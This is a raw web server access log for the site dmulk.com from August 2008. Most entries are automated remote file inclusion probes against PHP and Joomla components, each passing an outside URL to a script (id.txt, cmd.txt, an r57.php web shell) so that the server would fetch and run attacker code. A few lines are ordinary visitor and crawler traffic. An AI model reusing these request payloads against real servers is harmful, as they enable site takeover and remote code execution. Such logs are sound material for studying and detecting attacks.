61.19.158.41 - - [28/Aug/2008:10:08:12 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:08:13 -0700] "GET /logs/access_080502.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:08:21 -0700] "GET /logs/access_080401.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:08:21 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:08:22 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:08:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-051.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:08:23 -0700] "GET /logs/access_080511.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:10:08:27 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:10:08:27 -0700] "GET //admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:10:08:27 -0700] "GET /logs//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.172.33.53 - - [28/Aug/2008:10:08:35 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:08:36 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:08:40 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:08:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:08:41 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:08:44 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:08:56 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=10&order=Borrowers&order_type=ASC HTTP/1.1" 200 33105 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=10&order=PropertyAddress&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:09:02 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=9&order=Borrowers&order_type=ASC HTTP/1.1" 200 33006 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=10&order=Borrowers&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
65.182.187.86 - - [28/Aug/2008:10:09:03 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:09:05 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=8&order=Borrowers&order_type=ASC HTTP/1.1" 200 33097 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=9&order=Borrowers&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
68.8.232.250 - warboard [28/Aug/2008:10:09:09 -0700] "GET /warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=7&order=Borrowers&order_type=ASC HTTP/1.1" 200 33037 "http://www.dmulk.com/warboard/index.php?&table_name=warboard_main&function=search&where_clause=&page=8&order=Borrowers&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:09:28 -0700] "GET /logs/access_080302.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:09:29 -0700] "GET /errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:09:29 -0700] "GET /logs/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:09:31 -0700] "GET //index.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 200 85151 "-" "libwww-perl/5.805" "www.dmulk.com"
137.192.243.2 - - [28/Aug/2008:10:09:41 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:09:41 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.2.246.201 - - [28/Aug/2008:10:09:51 -0700] "GET /logs/access_080724.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://tvknob.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.139.104.33 - - [28/Aug/2008:10:09:51 -0700] "GET /logs/access_080711.log/index.php?cmd=http://www.comfasucre.com.co/joomla/www.paypal.com/cgi-bin/ConfirmeMyAccount/webcmd_dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.139.104.33 - - [28/Aug/2008:10:09:52 -0700] "GET /logs/access_080711.log/index.php?cmd=http://www.comfasucre.com.co/joomla/www.paypal.com/cgi-bin/ConfirmeMyAccount/webcmd_dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.182.98 - - [28/Aug/2008:10:09:55 -0700] "GET /logs/access_080511.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.74.198.93 - - [28/Aug/2008:10:09:56 -0700] "GET /logs/access_080309.log///index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.139.104.33 - - [28/Aug/2008:10:09:59 -0700] "GET /logs/access_080711.log/index.php?cmd=http://www.comfasucre.com.co/joomla/www.paypal.com/cgi-bin/ConfirmeMyAccount/webcmd_dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:10:20 -0700] "GET /logs/access_080302.log/popup.php?path=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:10:20 -0700] "GET /popup.php?path=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:10:20 -0700] "GET /logs/popup.php?path=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.139.104.33 - - [28/Aug/2008:10:10:22 -0700] "GET /logs/access_080615.log/index.php?cmd=http://www.comfasucre.com.co/joomla/www.paypal.com/cgi-bin/ConfirmeMyAccount/webcmd_dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.139.104.33 - - [28/Aug/2008:10:10:26 -0700] "GET /logs/access_080615.log/index.php?cmd=http://www.comfasucre.com.co/joomla/www.paypal.com/cgi-bin/ConfirmeMyAccount/webcmd_dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.139.104.33 - - [28/Aug/2008:10:10:31 -0700] "GET /logs/access_080615.log/index.php?cmd=http://www.comfasucre.com.co/joomla/www.paypal.com/cgi-bin/ConfirmeMyAccount/webcmd_dispatch=5885d80a13c0db1f1ff80d546411d7f84f1036d8f209d3d19ebb6f4eeec8bd0e/mc?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:10:37 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
163.19.117.1 - - [28/Aug/2008:10:10:37 -0700] "GET /logs/access_080321.log/joomla/index.php?option=com_restaurante&task=http://africa-success.net/administrator/components/com_remository/idwi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:11:00 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:11:20 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:11:21 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 200 85463 "-" "libwww-perl/5.803" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:11:36 -0700] "GET /logs/errors.php?error=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.206.23.168 - - [28/Aug/2008:10:11:40 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.stjudechattanooga.org/css/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.30.163.170 - - [28/Aug/2008:10:11:40 -0700] "GET /logs/access_080722.log/errors.php?error=http://georgebush.estoyenred.es/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:11:49 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:11:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.206.238.35 - - [28/Aug/2008:10:11:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.yayang.co.uk/ml/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [28/Aug/2008:10:12:14 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [28/Aug/2008:10:12:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://socomalliance.com/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:12:22 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:12:22 -0700] "GET /logs/access_080723.log//e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.50.70.78 - - [28/Aug/2008:10:12:26 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:12:28 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:12:35 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:12:35 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:12:36 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:12:38 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0064.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:12:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0056.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:13:43 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:13:43 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:13:44 -0700] "GET /logs/access_080224.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.54.82 - - [28/Aug/2008:10:14:00 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.desperate-souls.com/templates/portax/images/media/ida.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.111.11.7 - - [28/Aug/2008:10:14:02 -0700] "GET /logs/access_071222.log/errors.php?error=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:10:14:35 -0700] "GET /logs/access_080820.log/?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:10:14:37 -0700] "GET /?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 85159 "-" "libwww-perl/5.811" "www.dmulk.com"
72.55.148.240 - - [28/Aug/2008:10:14:37 -0700] "GET /logs/?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 200 62571 "-" "libwww-perl/5.811" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:10:14:51 -0700] "GET /logs/access_080306.log//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:10:14:52 -0700] "GET //admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:10:14:52 -0700] "GET /logs//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.36 - - [28/Aug/2008:10:14:59 -0700] "GET /main.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [28/Aug/2008:10:15:03 -0700] "GET /logs/access_080401.log/main.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.36 - - [28/Aug/2008:10:15:07 -0700] "GET /logs/main.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [28/Aug/2008:10:15:13 -0700] "GET /logs/access_080321.log//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.243.44.3 - - [28/Aug/2008:10:15:14 -0700] "GET /logs/access_080504.log//admin/classes/errors.php?error=http://www.h4x0rs.kit.net/r57.php????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.188 - - [28/Aug/2008:10:15:19 -0700] "GET /blog/index.php/2008/08/?show=gallery HTTP/1.0" 200 101424 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
222.236.221.63 - - [28/Aug/2008:10:15:21 -0700] "GET /logs/access_080207.log//errors.php?error=http://www.sldating.fr/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:16:02 -0700] "GET /logs/access_080224.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:16:02 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.52.173.110 - - [28/Aug/2008:10:16:02 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.202.3.193 - - [28/Aug/2008:10:16:43 -0700] "GET /logs/access_080820.log/-scanhttp://www.dragondyne.com///modules/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:16:43 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:16:44 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:16:44 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:16:50 -0700] "GET /logs/access_080514.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:16:51 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:17:21 -0700] "GET /logs/access_080421.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.168.150.67 - - [28/Aug/2008:10:17:23 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-133.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "dmulk.com"
209.85.26.17 - - [28/Aug/2008:10:17:24 -0700] "GET /logs/access_080224.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://vefhonnun.xnet.is/reikningar/users/2004684659/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:10:17:24 -0700] "GET /logs/access_080820.log////?prefix=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:10:17:26 -0700] "GET ////?prefix=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 85279 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [28/Aug/2008:10:17:28 -0700] "GET /logs////?prefix=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 200 62578 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.24 - - [28/Aug/2008:10:17:30 -0700] "GET /blog/index.php/category/motorcycles/page/2/ HTTP/1.1" 404 8085 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:17:32 -0700] "GET /logs/access_080224.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:17:32 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [28/Aug/2008:10:17:32 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:17:42 -0700] "GET /logs/access_080407.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:17:42 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:18:20 -0700] "GET /logs/access_080224.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:18:20 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [28/Aug/2008:10:18:20 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.27.110.65 - - [28/Aug/2008:10:18:22 -0700] "GET /logs/access_080723.log%20//e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:18:45 -0700] "GET /logs/access_080329.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
61.19.158.41 - - [28/Aug/2008:10:18:46 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:18:52 -0700] "GET /logs/access_080412.log/?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:18:53 -0700] "GET /?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 200 85051 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.79 - - [28/Aug/2008:10:18:54 -0700] "GET /logs/?sourcedir=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 200 62571 "-" "libwww-perl/5.65" "www.dmulk.com"
200.251.162.130 - - [28/Aug/2008:10:18:54 -0700] "GET /logs/access_080301.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.uba.dk/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
